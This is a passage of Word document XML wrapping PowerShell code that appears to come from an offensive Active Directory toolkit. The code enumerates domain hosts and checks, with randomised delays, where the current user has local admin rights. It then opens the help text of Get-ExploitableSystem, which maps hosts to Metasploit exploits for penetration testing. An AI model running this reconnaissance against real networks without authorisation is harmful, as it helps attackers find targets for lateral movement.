    <w:p w14:paraId="3C166224" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BFCEBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # use the local domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766A92A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = @( (Get-NetDomain).name )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71881B41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8A74B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13AB6952" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F4190D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Querying domain $Domain for hosts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71CC47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B6C7B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63187E23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DABE992" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # remove any null target hosts, uniquify the list and shuffle it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072C4C40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975EE4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($($ComputerName.Count) -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C43922E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                throw "No hosts found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574BCDDE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1225B1B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1F7AD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="11B78CC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # script block that enumerates a server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499F8002" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $HostEnumBlock = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FEB9E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            param($ComputerName, $Ping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E78FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="12E41984" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Up = $True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B398D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            if($Ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFA8F26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46527CFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65921475" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Up) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3027B3D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # check if the current user has local admin access to this server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2AB85C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Access = Invoke-CheckLocalAdminAccess -ComputerName $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF9449" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($Access.IsAdmin) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D189FE4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BAD2D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E370986" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307532D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2C6828" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="11A47849" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA7535F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47364EF5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097FF921" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D851E97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Threads) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F331CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Using threading with threads = $Threads"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC9EF4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2FEDF314" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're using threading, kick off the script block with Invoke-ThreadedFunction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56931038" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ScriptParams = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E218E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                'Ping' = $(-not $NoPing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E20041" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77308923" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C0A0784" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # kick off the threaded script block + arguments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF19E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F21DA01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B55AD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4869C08B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0C6C51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(-not $NoPing -and ($ComputerName.count -ne 1)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A419DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # ping all hosts in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69814D8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20896714" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524434F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB0EB9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="274B6729" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C15F2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Counter = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6CD535" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D3C0AE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Computer in $ComputerName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737AFFAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50AFA627" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Counter = $Counter + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D860E64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1AE30592" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # sleep for our semi-randomized interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1259739B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB4B251" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B2978F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51123D4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C674D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7D029F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA4F2C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771C3AC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107BE6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71216F94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2AC27701" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-ExploitableSystem {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015C2D1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483BA3E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .Synopsis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330AA942" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B0C28F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This module will query Active Directory for the hostname, OS version, and service pack level  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C32FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for each computer account.  That information is then cross-referenced against a list of common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098D1B02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Metasploit exploits that can be used during penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0551E250" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3163CE96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF91AD2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B86CB52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This module will query Active Directory for the hostname, OS version, and service pack level  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D32EB3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for each computer account.  That information is then cross-referenced against a list of common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05779D4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Metasploit exploits that can be used during penetration testing.  The script filters out disabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D9EBB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        domain computers and provides the computer's last logon time to help determine if it's been </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B347810" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        decommissioned.  Also, since the script uses data tables to output affected systems the results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EEDA92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        can be easily piped to other commands such as test-connection or a Export-Csv.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74440E4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="71E54BBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049721C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34F75E81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return computers with a specific name, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F14FD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14907779" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05440F50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F0C25F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return computers with a specific service principal name, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301832AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B5C92BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER OperatingSystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1975C3C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55E4C42B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return computers with a specific operating system, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444690C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="622CA5AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ServicePack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DC4B43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4F4047BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Return computers with a specific service pack, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700D2E45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44B4FCA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4CBE85" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1135F532" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A customized ldap filter string to use, e.g. "(description=*admin*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C42D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="176C7352" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3690BC06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="698A0499" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Ping each host to ensure it's up before enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDF5A4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0997BAA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF5BC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3FD097FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for computers, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063B5AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4C3D95D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AA842A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="359D3366" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC99882" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52ECA5DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA40C30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F7485C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743CCBD4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B64681E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="35FB3A84" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Unconstrained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020097D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6BCE14A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Return computer objects that have unconstrained delegation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFB4D0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52C79203" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D394FF6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2ABD6629" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
